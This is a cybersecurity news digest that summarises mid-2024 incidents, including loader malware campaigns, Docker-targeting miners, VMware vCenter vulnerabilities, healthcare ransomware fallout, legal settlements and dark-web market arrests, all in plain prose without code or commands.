Daily Brief

Threat actors are using free or counterfeit software to distribute Hijack Loader and Vidar Stealer malware. Compromised Cisco Webex Meetings app downloads lead to the execution of stealthy malware loaders via DLL side-loading. The malware leverages enhanced privileges to escape detection by adding itself to Windows Defender's exclusion list. Apart from stealing information, the malware also installs a cryptocurrency miner and other malicious payloads on victims' systems. Techniques involve PowerShell scripts and deceptive browser update prompts to entice victims into executing malicious code. Detection challenges arise due to malware’s ability to mask its association with any files and the reliance on user interaction. Multiple cybersecurity firms have reported on the diverse tactics and payloads utilized in recent sophisticated phishing and malware campaigns. Security experts emphasize the importance of vigilance when downloading software and clicking on links, even from seemingly legitimate sources.

The U.S. government will cease financial support on July 12 for healthcare providers impacted by the Change Healthcare ransomware attack in February. The Centers for Medicare & Medicaid Services (CMS) initiated support programs in March offering funding and relaxed rules for affected organizations to maintain operations. Over $3.2 billion in accelerated payments have been disbursed to nearly 9,000 Medicare providers to help manage cash flow disruptions caused by the cyberattack. The support measures included allowing Medicare Advantage and Medicaid plans to provide advanced funding, and the acceptance of paper claims by Medicare Administrative Contractors while electronic systems were offline. Though most of the emergency funding (96%) has been repaid, ongoing challenges persist for some providers beyond the July 12 cutoff. CMS continues to encourage all healthcare entities to prioritize cybersecurity enhancements and remains ready to address future cyber incidents. The ransomware attack has been one of the costliest for the healthcare sector, with estimated costs nearing $1 billion, including a $22 million ransom payment to the attackers.

NHS Dumfries and Galloway CEO confirms that cybercriminals accessed and copied sensitive data during a February cyberattack. Data from approximately 150,000 individuals leaked after the trust refused to comply with ransom demands. Victims are primarily residents from Dumfries and Galloway; targeted communications and general notices are being distributed. The leaked data raises concerns over identity theft, cybersecurity threats, extortion, and mental health impacts. The situation parallels the 2022 Medibank breach in Australia, which also faced a ransom demand that was not met. Efforts to analyze and prioritize the leaked data focus on identifying and assisting high-risk or vulnerable patients. CEO Julie White offers an apology and reiterates the organization's commitment to transparency and adherence to law enforcement advice. Dumfries and Galloway NHS has published a detailed FAQ and summary online to clarify the breach's context and implications.

Seventy percent of enterprises have initiated dedicated teams to bolster security for Software as a Service (SaaS) applications. Despite 2023's economic and job market challenges, organizations have markedly increased resources for SaaS security, including a 56% rise in staffing and a 39% increase in budget allocations. The survey reveals a significant shift in prioritization, with 80% of organizations now focusing on SaaS security, a sharp contrast to its historical position as an afterthought. Enhanced SaaS security strategies have led to better capability maturation and visibility into SaaS applications, with marked improvements in detection and configuration management. Major challenges persist, particularly in achieving visibility into business-critical applications and managing risks associated with third-party apps and SaaS misconfigurations. The survey points to the effectiveness of SaaS Security Posture Management (SSPM) tools, highlighting users experience better control and ease in managing SaaS security compared to other methods. Overall, the surveyed data indicates a positive trend in SaaS security outcomes and mitigation of security incidents, suggesting robust investment and strategic implementation are paying dividends.

Cybersecurity experts have discovered a new malware targeting openly accessible Docker API endpoints to deploy cryptocurrency miners. The malware utilizes a variety of tools, including a remote access capability that allows further malicious software downloads and distribution through SSH. The attackers focus on Docker servers with open port 2375, conducting a multi-stage attack including reconnaissance, privilege escalation, and exploitation. A complex chain of scripts and binaries, including scripts named “b.sh” and “ar.sh,” are employed to configure remote access, scan for other vulnerable hosts, and install additional payloads. The malware incorporates a Go-based binary, "chkstart," enhancing the complexity of the malware and making analysis more difficult compared to previous versions written in shell script. Additional payloads like "exeremo" for lateral movement and "fkoths," a Go-based binary to erase traces, signify an advanced attempt to maintain persistence and avoid detection. These findings indicate continuous improvement and adaptation by the attackers, highlighting persistent security risks associated with misconfigured Docker hosts.

VMware has released critical security updates for Cloud Foundation, vCenter Server, and vSphere ESXi. The updates address vulnerabilities that could lead to privilege escalation and remote code execution. Identified vulnerabilities include two discovered by researchers at QiAnXin LegendSec and one by Deloitte Romania. Affected versions are specifically vCenter Server versions 7.0 and 8.0; patches are available in newer subversions. Prior similar issues were patched in October 2023, involving the DCE/RPC protocol. VMware advises users to apply these critical patches promptly despite no current active exploitation reports.

Singapore Police Force has extradited two Malaysians linked to an Android malware scam targeting Singapore citizens. The suspects allegedly used phishing campaigns to install malicious apps on victims' devices to steal personal data and banking credentials. In collaboration with Hong Kong and Malaysian police, a lengthy investigation linked the suspects to a criminal syndicate. The malware disguised as discounted goods apps allowed remote access to victims' devices, capturing sensitive data and enabling unauthorized transactions. Assets including cryptocurrency and real estate worth over $1.33 million have been seized in related arrests, with 16 criminals captured so far. The malicious operations have affected over 4,000 victims, highlighting the extensive impact of the scam. One suspect faces up to ten years in prison and $500,000 in fines, underlining the severity of the penalties for such cybercrimes.

VMware, now owned by Broadcom, has disclosed two critical vulnerabilities in its vCenter Server product, used to manage virtual machines and hosts. Identified as CVE-2024-37079 and CVE-2024-37080, both vulnerabilities are rated 9.8 out of 10 for severity and involve heap-overflow issues in the DCE/RPC protocol implementation. A malicious actor could exploit these vulnerabilities by sending a specially crafted network packet, potentially leading to remote code execution. Although patched versions of vCenter Server and Cloud Foundation are available, there is no information about the applicability of these fixes to older vSphere versions 6.5 and 6.7, which are widely used but no longer supported. VMware also reported a third, less critical vulnerability, CVE-2024-37081, related to local privilege escalation due to sudo misconfiguration, scoring it as important (7.8). There are currently no known exploits of these vulnerabilities "in the wild," according to VMware. The discovery of these vulnerabilities was credited to Matei "Mal" Badanoiu from Deloitte Romania.

Researchers from Seoul National University, Samsung Research, and Georgia Institute of Technology have discovered vulnerabilities in ARM's Memory Tagging Extensions (MTE). The vulnerabilities allow attackers to breach memory tags 95% of the time through speculative execution techniques. MTE was designed to protect against commonly exploited memory safety vulnerabilities in C/C++ programming, like buffer overflows and heap-use-after-free attacks. The effective bypass raises concerns about MTE’s ability to secure applications on Arm processors, despite Arm’s reassurances. Findings challenge earlier works, including those by Google's Project Zero, which did not identify side-channel attacks capable of breaking MTE. Researchers demonstrated their technique's efficacy by extracting MTE tags from Google Chrome on Android and Linux, using proof-of-concept code now available on GitHub. The suggested mitigation involves placing speculation barriers and limiting gadget construction in affected software like Chromium and Linux kernel code. Despite acknowledging the issue, Arm insists the value of MTE stands, although they recommend additional mechanisms to prevent speculative execution oracles.

Guidehouse and Nan McKay and Associates (NMA) agreed to pay $11.3 million to settle allegations related to cybersecurity failures. The settlements were the result of inadequate cybersecurity testing for New York’s emergency rental assistance program during the COVID-19 pandemic. Both firms failed to effectively test the ERAP system before deployment, resulting in sensitive data leakage shortly after the system went live. About 12 hours post-launch, it was discovered that personal information was leaking onto the internet. Although an investigation indicated no unauthorized use of Personally Identifiable Information (PII), the exposure triggered a formal "Information Security Breach" protocol. In addition to the data breach, Guidehouse admitted to using unauthorized third-party cloud software for storing PII. The US Attorney emphasized the importance of fulfilling cybersecurity obligations, especially when handling sensitive information under federal contracts.

A new malware campaign uses fake error messages from popular applications like Google Chrome, Microsoft Word, and OneDrive to deceive users into running malicious PowerShell scripts. The campaign involves various threat actors, including ClearFake, ClickFix, and TA571, noted for their spam operations that spread malware and ransomware. The method involves social engineering to convince users that there is a legitimate issue with their software, offering a PowerShell "fix" as a solution, which instead instigates malware installation. Techniques employed in these attacks include malicious overlays on websites, deceptive JavaScript in HTML attachments, and emails masquerading as official documents that prompt PowerShell command execution. Representative malware payloads delivered by these scripts include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. Proofpoint analysts identified three primary attack chains, suggesting a progressive refinement and testing of techniques to increase infection rates. Overall, attackers exploit user trust and lack of technical awareness, coupled with Windows' limitations in blocking such intrusions initiated by PowerShell.

Federal agents arrested Thomas Pavey and Raheim Hamilton, alleged operators of the dark-web marketplace Empire Market, accused of facilitating illegal transactions valued over $430 million. Empire Market, active from 2018 through 2020, offered a wide range of illicit goods including drugs, stolen account credentials, counterfeit money, and malware. The marketplace supported an ecosystem of thousands of vendors and was accessed via specialized software, with transactions exclusively in cryptocurrency to maintain anonymity. The site encouraged the use of cryptocurrency tumblers to obscure the origins of transaction funds, complicating efforts by law enforcement to trace illegal activities. In addition to current charges, Pavey and Hamilton were previously involved in selling counterfeit U.S. currency on another now-defunct dark-web market, AlphaBay. Authorities seized $75 million in cryptocurrency, along with cash and precious metals, during the investigation. The charges against the individuals include drug trafficking, computer fraud, money laundering among others, which could lead to life imprisonment. Both suspects remain detained awaiting federal arraignment.

Panera Bread likely paid a ransom following a ransomware attack in March, which disrupted their operations for a week. The attack encrypted all virtual machines, affecting Panera's website, mobile app, point-of-sale, and internal systems. Data including employee names and social security numbers were stolen, and Panera started sending data breach notifications to affected parties. Internal communications suggested Panera received assurances that the stolen data would be deleted and not published. An alleged employee claimed on Reddit that Panera paid the hackers to avoid the public leak of stolen data. No ransomware gang has claimed responsibility for the attack or threatened to leak the data, which is unusual if no payment was made. Ransomware attacks often involve data theft and encryption, using this leverage to demand payment for data deletion and decryption. Paying a ransom does not guarantee data deletion; threat actors may not fulfill their promises as seen in other recent incidents.

Blackbaud, a cloud software company, agreed to pay $6.75 million in a settlement with California's attorney general for cybersecurity negligence during a 2020 ransomware attack. The attorney general criticized Blackbaud for insufficient cybersecurity measures and misleading the public about the breach's impact, which involved personal data exposure. Despite settling with the Federal Trade Commission without a fine, Blackbaud previously settled similar allegations with 49 other states and the District of Columbia for $49.5 million. The ransomware breach resulted in unauthorized access to the sensitive personal information of millions, including social security numbers and medical details. Critical allegations included the use of weak or default passwords and the lack of multi-factor authentication for accessing sensitive areas. The settlement requires Blackbaud to enhance security practices, including better password management, data retention, and infrastructure monitoring. This is viewed as the final settlement in the U.S. related to Blackbaud's 2020 incident after prior multiple state settlements and a smaller fine to SEC.

Suspected Chinese hackers, dubbed 'Velvet Ant,' utilized custom malware on compromised F5 BIG-IP devices to establish persistent network access and clandestinely exfiltrate sensitive data for three years. The hacking group exploited vulnerabilities in outdated F5 BIG-IP appliances used for firewall management and network load balancing, which were exposed online. Velvet Ant deployed various malware, including a modular remote access Trojan (RAT) called PlugX, traditionally favored by Chinese cyber actors for data harvesting. The attackers cleverly disguised their malicious traffic as legitimate, enabling them to bypass corporate security measures and continuously steal customer and financial information without detection. Despite initial eradication efforts by security professionals at Sygnia, the hackers redeployed their tools with updated configurations to evade detection and maintain their foothold. Sygnia underscored the critical need for a layered, comprehensive security strategy for network devices, which are often targets for initial breaches. The report indicated a worrying trend in 2023, where China-linked hackers increasingly exploited network infrastructure vulnerabilities across various devices to gather intelligence and infiltrate further into target networks.